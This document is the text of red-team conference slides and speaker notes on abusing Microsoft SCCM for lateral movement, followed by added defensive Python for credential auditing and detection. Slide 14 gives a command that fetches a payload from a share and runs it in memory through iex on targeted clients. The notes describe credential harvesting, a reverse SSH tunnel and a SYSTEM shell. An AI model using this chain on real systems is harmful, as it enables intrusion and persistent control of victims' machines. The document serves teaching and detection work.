2. @enigma0x3
❖ Penetration Tester and Red Teamer for the Adaptive Threat Division (ATD) of Veris Group
❖ Active developer on the PowerShell Empire project
❖ Offensive PowerShell advocate
❖ 2nd time speaking!
❖ This con is probably older than I am
❖ Indiana corn farmer turned h4x0r (not really)
3. What this is...
❖ What is SCCM and how some admins fail at securing it
❖ Ways to abuse Microsoft’s System Center Configuration Manager (SCCM) for targeted network compromise.
➢ I’m going to cover targeted, strategic use as opposed to mass pwnage
4. Setting the Stage
❖ This talk assumes you have RDP access to a SCCM server
❖ This talk is focused on abusing SCCM for lateral movement/persistence in a targeted manner, not obtaining access to SCCM.
❖ No, having access to SCCM does not mean you own the enterprise
❖ If you administer SCCM as a domain admin, you fail.
5. What is SCCM?
❖ Platform for distributing packages/applications to clients
❖ Packages, applications and install scripts are hosted on the SCCM server
❖ Setup and maintained via an agent/server architecture
❖ Consists of a central site server with distribution points.
➢ Agents check in to the server periodically to obtain new packages/applications
❖ Basically acts as internal RAT/C2
6. SCCM in the enterprise
❖ 1 central site server with multiple distribution points
❖ Typically managed via controlled groups
➢ e.g. “SCCM Admins” in AD
❖ Typically setup/configured using a service account to run the application/push updates
❖ Application contents (*cough, cough install scripts and notes*) are hosted on a publicly available share
❖ Admins gonna admin
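The slide above (and the speaker note that service account and local admin credentials often sit in install scripts and notes) describes a hygiene problem on the package source share. The following is an added example, not code from the talk or its author: a small Python audit that SCCM admins can run over their own package source before it is exposed on a readable share. It flags the common ways a password ends up in a script or note and redacts the secret in its report so the output itself does not leak anything. The file names, file contents and regex heuristics are all constructed for this example.

```python
import os
import re

# Constructed heuristics for the usual ways credentials land in package
# source scripts and notes. By convention the last matching group of each
# regex is the secret, so the report can redact it.
CREDENTIAL_PATTERNS = [
    ("key-value-password",
     re.compile(r"""\b(password|passwd|pwd)\s*[=:]\s*['"]?([^\s'"]+)""", re.IGNORECASE)),
    ("password-flag",                       # e.g. psexec -p Secret, -Password "Secret"
     re.compile(r"""(?:^|\s)-(password|pwd|p)\s+['"]?([^\s'"]+)""", re.IGNORECASE)),
    ("net-use-inline-password",             # net use X: \\srv\share Secret /user:DOM\acct (or password last)
     re.compile(r"""\bnet\s+use\b.*?(?:\s([^\s/*\\]\S*)\s+/user:\S+|/user:\S+\s+([^\s/*\\]\S*))""",
                re.IGNORECASE)),
    ("plaintext-securestring",              # ConvertTo-SecureString 'Secret' -AsPlainText
     re.compile(r"""ConvertTo-SecureString\s+['"]?([^\s'"]+?)['"]?\s+-AsPlainText""", re.IGNORECASE)),
]


def audit_text(name, text):
    """Return one finding per (line, pattern) hit, with the secret redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in CREDENTIAL_PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            # last non-empty group is the secret (see convention above)
            secret = next((g for g in reversed(match.groups()) if g), None)
            excerpt = line.replace(secret, "<redacted>") if secret else line
            findings.append({"file": name, "line": lineno, "type": label, "excerpt": excerpt.strip()})
    return findings


def audit_files(files):
    """files: mapping of file name -> file content."""
    findings = []
    for name, text in files.items():
        findings.extend(audit_text(name, text))
    return findings


def audit_directory(root):
    """Walk a package source tree (e.g. a local copy of the share) and audit every file."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            path = os.path.join(dirpath, n)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
            except OSError:
                continue
    return audit_files(files)


# Constructed sample package source: three files with embedded credentials, one clean.
SAMPLE_FILES = {
    "Install-Agent.ps1": (
        "$cred = New-Object PSCredential('CORP\\svc_sccm', "
        "(ConvertTo-SecureString 'Winter2015!' -AsPlainText -Force))\n"
        "Start-Process msiexec.exe -ArgumentList '/i agent.msi /qn'\n"
    ),
    "map_source.cmd": (
        "@echo off\n"
        "net use S: \\\\sccm01\\sccmsource Winter2015! /user:CORP\\svc_sccm\n"
        "copy S:\\app\\setup.exe %TEMP%\n"
    ),
    "notes.txt": (
        "Local admin on imaged boxes: password=Imag1ng2015 (change after deployment)\n"
        "Contact helpdesk for issues.\n"
    ),
    "Install-Clean.ps1": (
        "Start-Process msiexec.exe -ArgumentList '/i agent.msi /qn' -Wait\n"
        "Get-Content .\\install.log\n"
    ),
}

if __name__ == "__main__":
    for f in audit_files(SAMPLE_FILES):
        print(f"{f['file']}:{f['line']} [{f['type']}] {f['excerpt']}")
```

The patterns are deliberately noisy heuristics; the point is that anything they flag should be moved out of the share (into a deployment that runs under the SCCM client's own context, or into a proper secret store) rather than left for whoever can read the share.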
8. Right Click Tools
❖ Add-On that can be installed to assist in client management tasks
❖ Should be installed on a client such as an administrative workstation...not on the server
➢ Admins install it on the server anyways
❖ Enables full control of managed endpoints
10. Why use SCCM in Red Teaming?
❖ Manages a ton of distributed clients
➢ Take control of the server and you have distributed workstation control
➢ SCCM agents are just waiting to run your code
❖ Live off of the land
➢ Keep your malicious implant count low, use SCCM for very targeted implant distribution
➢ Looks like normal day-to-day traffic/activity
➢ To limit the risk of getting caught, become an admin and not a typical adversary
11. Why use SCCM in Red Teaming? (cont)
❖ Allows you to identify and strategically group targets
➢ Able to push implants out in a very controlled and surgical manner
❖ Also acts as a persistence mechanism
12. Abusing SCCM: Hunting
❖ Some organizations have user->device mapping
➢ This allows for admins to create specific groups for departments
❖ We can abuse this to hunt for specific users without generating any additional network/domain traffic
13. Abusing SCCM: Compromise
❖ Create an application/package that utilizes PowerShell for payload delivery and execution
❖ Do so by creating a PowerShell payload and throw it up on the public share SCCM uses (typically something like sccmsource)
14. Abusing SCCM: Compromise
❖ Create a script installer application to fetch and execute your payload
➢ cmd.exe /c "powershell.exe -c "gc \\serverName\sharedFolder\ApplicationFolder\payload.txt | iex""
❖ Deploy the application to your target group and wait for the SCCM agents to check in
➢ Payload is fetched over UNC and runs in memory
❖ More here:
➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/
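The execution chain on this slide (SCCM client spawns cmd.exe, which runs PowerShell that reads a text file over UNC and pipes it to iex) is what a defender should be looking for in process-creation telemetry. The following is an added example, not code from the talk or its author: Python detection logic run over a few constructed process-creation records. The record format (`host|ParentImage|Image|CommandLine`, command line last because it can contain `|`), the host names and the share name are assumptions; real Sysmon or 4688 events would need their own parser, but the scoring is the same.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# A UNC path: \\server\share... (no whitespace or quotes inside)
UNC_PATH = re.compile(r"""\\\\[^\\\s"']+\\[^\s"']+""")
# In-memory execution of whatever was read
IEX_PATTERN = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
# Cmdlets/aliases that read content from a path or URL
CONTENT_READ = re.compile(r"\b(gc|get-content|cat|type|iwr|invoke-webrequest|downloadstring)\b",
                          re.IGNORECASE)
# The SCCM client agent as the parent process
SCCM_CLIENT = re.compile(r"\\ccm\\ccmexec\.exe$", re.IGNORECASE)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse the constructed 'host|ParentImage|Image|CommandLine' record format."""
    fields = {}
    for part in line.split("|", 3):          # at most 3 splits: CommandLine keeps its own '|'
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    try:
        return ProcessEvent(fields["host"], fields["ParentImage"], fields["Image"], fields["CommandLine"])
    except KeyError as exc:
        raise ValueError(f"malformed record, missing {exc}: {line!r}") from None


def assess(event: ProcessEvent) -> Tuple[Optional[str], List[str]]:
    """Score one event. Returns (severity or None, reasons)."""
    cmd = event.command_line
    reasons = []
    if IEX_PATTERN.search(cmd):
        reasons.append("invoke-expression")
    if UNC_PATH.search(cmd) and CONTENT_READ.search(cmd):
        reasons.append("unc-read")
    if SCCM_CLIENT.search(event.parent_image):
        reasons.append("sccm-client-parent")

    # Reading a UNC path straight into iex is the download-cradle shape from the slide.
    if "invoke-expression" in reasons and "unc-read" in reasons:
        return "high", reasons
    # Either half on its own is worth a look when the SCCM agent is the parent.
    if "sccm-client-parent" in reasons and ("invoke-expression" in reasons or "unc-read" in reasons):
        return "medium", reasons
    return None, reasons


def scan(lines):
    """Return the flagged events as dicts, in input order."""
    hits = []
    for line in lines:
        event = parse_event(line)
        severity, reasons = assess(event)
        if severity:
            hits.append({"host": event.host, "image": event.image,
                         "severity": severity, "reasons": reasons})
    return hits


# Constructed sample telemetry (hosts, paths and share names are made up).
SAMPLE_EVENTS = [
    # the chain from the slide, seen at the cmd.exe level (parent is the SCCM client)
    r'host=WS01|ParentImage=C:\Windows\CCM\CcmExec.exe|Image=C:\Windows\System32\cmd.exe'
    r'|CommandLine=cmd.exe /c "powershell.exe -c "gc \\sccm01\sccmsource\PSApp\payload.txt | iex""',
    # the same chain one level down (parent is cmd.exe)
    r'host=WS01|ParentImage=C:\Windows\System32\cmd.exe'
    r'|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r'|CommandLine=powershell.exe -c "gc \\sccm01\sccmsource\PSApp\payload.txt | iex"',
    # benign SCCM-driven install from the local client cache
    r'host=WS02|ParentImage=C:\Windows\CCM\CcmExec.exe'
    r'|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r'|CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\Windows\ccmcache\1a\Install-App.ps1',
    # reads a UNC path but never executes it, and not launched by SCCM
    r'host=WS03|ParentImage=C:\Windows\explorer.exe'
    r'|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r'|CommandLine=powershell.exe -c "gc \\fileserver\logs\app.log"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['host']} {hit['severity']:6} {hit['image']} {','.join(hit['reasons'])}")
```

Both the cmd.exe and the powershell.exe event of the deployed application score high, so the rule fires even when only one level of parent is logged; the legitimate package install from ccmcache and the plain UNC read do not fire. In a real environment the "medium" tier is where tuning happens, since SCCM-driven scripts that legitimately read UNC paths will show up there.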
16. Questions and Contact
❖ Feel free to hit me up!
❖ enigma0x3 [at] gmail [dot] com
❖ @enigma0x3 on Twitter and Github
❖ enigma0x3 on Freenode: #psempire
❖ Blog: enigma0x3.wordpress.com
Very targeted, strategic use instead of mass compromise
-External? Grab some workstation, reverse SSH tunnel w/ RDP access, RDP from there into SCCM server
-This is solely post-exploitation/maintaining access
(3:00)
Service account / local admin (LA) credentials are often in install scripts/notes
(6:00)
-If installed, basically your own internal C2 controller
-List running processes, system information, registry access, SYSTEM command shell
-Uses PsExec, which is naughty on red teams…
-This shell doesn’t work unless they put PsExec on the server...meaning if it exists, it will likely blend in just fine.
Might have access to all distribution points as well as central site server due to administration overhead
(9:00)
-If an application remains pushed out, hosts will continue to execute it during their normal check-ins
-An open share is a common setup as the SCCM agents have to grab the deployed installation packages somehow.
-PowerShell reaches out over UNC to grab the contents of the text file and executes it
(12:00)